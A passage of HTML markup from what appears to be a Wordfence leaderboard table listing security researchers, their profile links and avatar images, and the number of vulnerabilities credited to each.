					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bao" target="_blank" rel="noopener">Bao &#8211; BlueRock</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2b7e2a8d4c137f1479be4362c52fd452.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2b7e2a8d4c137f1479be4362c52fd452"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dodoh4t" target="_blank" rel="noopener">dodoh4t</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00b9210383dde323f6dbe14354fe953d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00b9210383dde323f6dbe14354fe953d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener">Legion Hunter</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4f2a3b32ba525d9a6cd33a222b91f5ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4f2a3b32ba525d9a6cd33a222b91f5ec"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener">Abdullah Kareem &#8220;cyberkareem&#8221;</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener">Tran Nguyen Bao Khanh</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/01dce303f1fab51371215f21992679d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01dce303f1fab51371215f21992679d9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theviper17y" target="_blank" rel="noopener">theviper17y</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/33af58759a2231f0c6ffdafd84ba15df.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="33af58759a2231f0c6ffdafd84ba15df"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc-huynh" target="_blank" rel="noopener">Luc Huynh from Noventiq RedTeam</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/cb9373b67e4240c01c77d2af2ea71179.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cb9373b67e4240c01c77d2af2ea71179"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/quoc-huy-jtwings" target="_blank" rel="noopener">Quốc Huy (jtwings)</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/steven-julian" target="_blank" rel="noopener">Steven Julian</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/97a1f88460217867f45b925b3af1bb6a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="97a1f88460217867f45b925b3af1bb6a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yudha" target="_blank" rel="noopener">Muhammad Yudha &#8211; DJ</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/791c547484c10e03a88616b631bb8a6a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="791c547484c10e03a88616b631bb8a6a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/expatch" target="_blank" rel="noopener">Expatch</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f005c4dc82929a63b828a2192c5e7c02.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f005c4dc82929a63b828a2192c5e7c02"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/parkhyunwoo" target="_blank" rel="noopener">ParkHyunWoo</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2be53568b04545bf9e036c375a3d44d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2be53568b04545bf9e036c375a3d44d9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener">Supakiad S. (m3ez)</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c10dbe06f111ce709fdc2628e94ac9a1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c10dbe06f111ce709fdc2628e94ac9a1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mitchell" target="_blank" rel="noopener">Mitchell</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d32e1aee83333c719f420f28c6f4f12f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d32e1aee83333c719f420f28c6f4f12f"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/choigyeongmin" target="_blank" rel="noopener">CHOIGYEONGMIN</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c0874a18e229dcb2938b35928da78680.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0874a18e229dcb2938b35928da78680"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/guillermo-alvarez" target="_blank" rel="noopener">Guillermo Álvarez</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1fcd4731afa8285a12c991cc8c7bdb09.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1fcd4731afa8285a12c991cc8c7bdb09"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/taylsec" target="_blank" rel="noopener">Taylsec</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1ff6f83f830b125bfe22fa490eb2bfe7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1ff6f83f830b125bfe22fa490eb2bfe7"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hieupenguinnn" target="_blank" rel="noopener">HieuPenguinnn</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5eb53283536a9b8ccb42a5ce5161b505.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5eb53283536a9b8ccb42a5ce5161b505"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abu-hurayra" target="_blank" rel="noopener">Abu Hurayra</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b1c4c306fad16439d9178a0d349f0c40.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b1c4c306fad16439d9178a0d349f0c40"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/l4m" target="_blank" rel="noopener">L4m</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/0412e840e77b2936441bafa1347ba51a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0412e840e77b2936441bafa1347ba51a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/arif-shaikh" target="_blank" rel="noopener">Arif Shaikh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3134259fccb2cd11ac78ae74096b9b91.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3134259fccb2cd11ac78ae74096b9b91"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/moonge" target="_blank" rel="noopener">moonge</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/890bcfbaf2c84c9c872bf1c027848673.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="890bcfbaf2c84c9c872bf1c027848673"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/afan" target="_blank" rel="noopener">Afan</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/33751fc657c409bebde901e7bad75981.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="33751fc657c409bebde901e7bad75981"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-anh-chu" target="_blank" rel="noopener">anhcd05</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/01e9ff51a749f2beebcde4e6d5b68519.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01e9ff51a749f2beebcde4e6d5b68519"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-cong-quang" target="_blank" rel="noopener">Nguyen Cong Quang</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/76b37473036c0cad989fac58fdce9e75.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="76b37473036c0cad989fac58fdce9e75"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/z3r0s" target="_blank" rel="noopener">z3r0s</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bonds" target="_blank" rel="noopener">Bonds</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/fa4bbc3f38e816243f092ee486e38350.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fa4bbc3f38e816243f092ee486e38350"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mrreee" target="_blank" rel="noopener">Mrreee</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3164f21bc10eced2a82b94d326c26614.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3164f21bc10eced2a82b94d326c26614"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/burak-kilinc-2" target="_blank" rel="noopener">NosleeP++</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/babyhack" target="_blank" rel="noopener">babyhack</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c8efd9cb349ced935be3ed3cedba2027.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c8efd9cb349ced935be3ed3cedba2027"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/gidget-smith" target="_blank" rel="noopener">gidget smith</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9fe3b597e2bbd23928882d43475fdeb9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9fe3b597e2bbd23928882d43475fdeb9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/timomangcut" target="_blank" rel="noopener">timomangcut</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/bdcb43576544351fa89720015a32ba9b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdcb43576544351fa89720015a32ba9b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener">Rafie Muhammad</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b0b4644b05bd456bc0330957bd08dbab.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0b4644b05bd456bc0330957bd08dbab"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vamshi-krishna-upadrasta" target="_blank" rel="noopener">Vamshi Krishna Upadrasta</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4ecc8b71d0984f421844d12e862a7638.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ecc8b71d0984f421844d12e862a7638"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener">Austin Ginder</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4c2bd6964b38518385c4e8d1791fd762.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4c2bd6964b38518385c4e8d1791fd762"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zaim" target="_blank" rel="noopener">zaim</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ed1755942aa6cb7ca0583880be85d3b3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ed1755942aa6cb7ca0583880be85d3b3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener">Osvaldo Noe Gonzalez Del Rio (Os)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/12f5edd9927331439d0317517c98b971.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="12f5edd9927331439d0317517c98b971"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/derrick-gilliland" target="_blank" rel="noopener">Derrick Gilliland</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1583c4af4ebd2ced2e51f0239cd87d35.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1583c4af4ebd2ced2e51f0239cd87d35"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/japaneseknotweed" target="_blank" rel="noopener">japaneseknotweed</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4ee838051f5b349d62b3dc49551eb17c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ee838051f5b349d62b3dc49551eb17c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hivesec" target="_blank" rel="noopener">hivesec</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/a9ec4eb223d84f01746308316732603e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a9ec4eb223d84f01746308316732603e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thaer-assfour" target="_blank" rel="noopener">Thaer Assfour</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6354b317fcf2c6bde1d3a0b7e8bd25f0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6354b317fcf2c6bde1d3a0b7e8bd25f0"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/testoun" target="_blank" rel="noopener">testoun</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e4f30e00e8f8df13ae1201de04dee2a6.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e4f30e00e8f8df13ae1201de04dee2a6"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/buitu" target="_blank" rel="noopener">buitu</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f36c6f9e5c03ad8f37eb6faab59d90d8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f36c6f9e5c03ad8f37eb6faab59d90d8"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/riyas-m-s" target="_blank" rel="noopener">Riyas M S</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1d97ecd82c6b11bb69844b705d48253b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1d97ecd82c6b11bb69844b705d48253b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/celvex-group" target="_blank" rel="noopener">Celvex Group</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/286d15edd1a2991d782433f14788645a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="286d15edd1a2991d782433f14788645a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/manopakorn-kooharueangrong" target="_blank" rel="noopener">Manopakorn Kooharueangrong (manop55555)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/a692e64baa9a1b2bf3d84c04518113ce.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a692e64baa9a1b2bf3d84c04518113ce"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/winis" target="_blank" rel="noopener">WiniS</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d1466fe98314dea2ebe93e44e7cc3b9c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d1466fe98314dea2ebe93e44e7cc3b9c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/securepeak-research-team" target="_blank" rel="noopener">Securepeak Research Team</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3d992d9e2b938fd987e3a29a99edccb4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3d992d9e2b938fd987e3a29a99edccb4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vincent-szopa" target="_blank" rel="noopener">Vincent Szopa (bioflavonoid)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/29493df1367bfd44a934c8b8f3bfcdf9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="29493df1367bfd44a934c8b8f3bfcdf9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/viet-anh-ngo" target="_blank" rel="noopener">Viet Anh Ngo</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/343456e443c863409724aa97bcfa6e3e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="343456e443c863409724aa97bcfa6e3e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/johska" target="_blank" rel="noopener">johska</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener">luc</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b7aa8462cc66f5fa9c714bb2c045ad16.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b7aa8462cc66f5fa9c714bb2c045ad16"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hurayraiit" target="_blank" rel="noopener">Abu Hurayra (HurayraIIT)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/a2666d41644bed51ac48fbdad00e2874.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a2666d41644bed51ac48fbdad00e2874"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/denny-abraham-sinaga" target="_blank" rel="noopener">Denny Abraham Sinaga</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6dd380c38e13e8dc02631e8ea879a9e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6dd380c38e13e8dc02631e8ea879a9e4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benzdeus" target="_blank" rel="noopener">benzdeus</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jh-hack" target="_blank" rel="noopener">jh_hack</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ab8bce3194dc26afaa5edaf1990620ee.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ab8bce3194dc26afaa5edaf1990620ee"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mike-montoya" target="_blank" rel="noopener">Mike Montoya</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/a964068aac6d7229783a0ea643877251.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a964068aac6d7229783a0ea643877251"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zer0gh0st" target="_blank" rel="noopener">zer0gh0st</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c3c30a52de4465cc659a66d464f7bb49.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c3c30a52de4465cc659a66d464f7bb49"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zainul-anwar-adi-putra" target="_blank" rel="noopener">Zainul Anwar Adi Putra</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
